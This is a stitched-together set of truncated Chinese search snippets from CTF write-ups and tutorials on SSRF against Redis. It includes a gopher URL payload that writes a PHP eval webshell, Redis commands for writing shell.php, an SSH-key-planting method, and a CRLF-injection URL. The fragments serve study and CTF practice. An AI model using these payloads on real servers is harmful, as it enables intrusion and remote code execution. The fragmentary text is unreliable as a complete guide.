看了源码发现是redis,搜搜相关的漏洞,发现了redis的ssrf漏洞,那就可以构造crlf利用ssrf来修改admin的密码,来达到登录获取到flag。这里看到一些相关我文章做参考。 https://blog.csdn.net/cd_xuyue/article/details/51760340 因为之前没接触过redis,,去搜搜看如何修改密码。 这里我不太
在redis下我们使用info即可获取redis的相关信息,对于gopher可以加上一个下划线在跟上info,同时我们也可以判断出ssrf的存在。 关于写入shell与定时计划 写入shell很简单,可以在本地试验一下。 flushall +OK config set dir /home/wwwroot/default/wordpress +OK config set dbfilename shell.php +OK set webshell "<...
敏感文件读取:通过SSRF漏洞,攻击者可以读取服务器上的敏感文件,如/etc/passwd、/c:/windows/win.ini等,获取系统配置信息和用户信息。 内网服务攻击:利用特定的协议(如dict、gopher等),攻击者可以攻击内网中的服务,如Redis、MySQL等,获取最高权限或执行恶意操作。三...
内网探测 ssrf+redis未授权源码中注释了?secret 访问可以得到当前靶机的ip 看到有不少师傅去开buu上的内网机做,这里实际上是一个 web服务器 和一个redis 服务器组成的一个内网,是独立于单容器的内网,并且自动组网(来自赵总的解释),所以直接开内网机并不能访问到靶机,直接用ssrf会快得多(当时出题没考虑到结合...
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2433%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A...
但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。
因此,此漏洞在没有配置密码的情况下可以利用SSRF来绕过绑定在本地的限制,从而实现在外网攻击内网应用。 1)利用redis来写ssh密钥 此处利用ssh生成一对公私钥,生成的默认文件为id_rsa.pub和id_rsa。把id_rsa.pub上传至服务器即可。我们利用redis把目录设置为ssh目录下: ...
假设服务器Ubuntu中的某个WEB应用存在SSRF漏洞,那我们就可以操作这个WEB服务器去读取本地的文件、探测内网主机存活、探测内网主机端口等,如果借助相关网络协议,我们还可以攻击内网中的Redis、MySql、FastCGI等应用,WEB服务器在整个攻击过程中被作为中间人进行利用。
url=http://redis:6379&method=*1%0D%0A$20%0D%0A&authorization=%0D%0ARENAME%20flag%20hash:37573C6A2DE58DFBD1C7507016D45291CBEFC92C%0D%0A' ERROR: Failed to retrieve content. $ curl http://hashcache-ctf.smarx.com/hash?gimme=now flag{SSRF_2_R3d1s}...
Redis协议,也被称为RESP (Redis Serialization Protocol),是一种简单的文本协议,用于客户端和服务器之间的数据操作和传输。它是SSRF攻击中常用的一种协议。绕过(Bypass):在CTFhub的SSRF内网访问中,可以利用伪协议读取文件,查看网站目录文件通常位于`var/www/html`目录下。通过发送特定请求,可以获取源...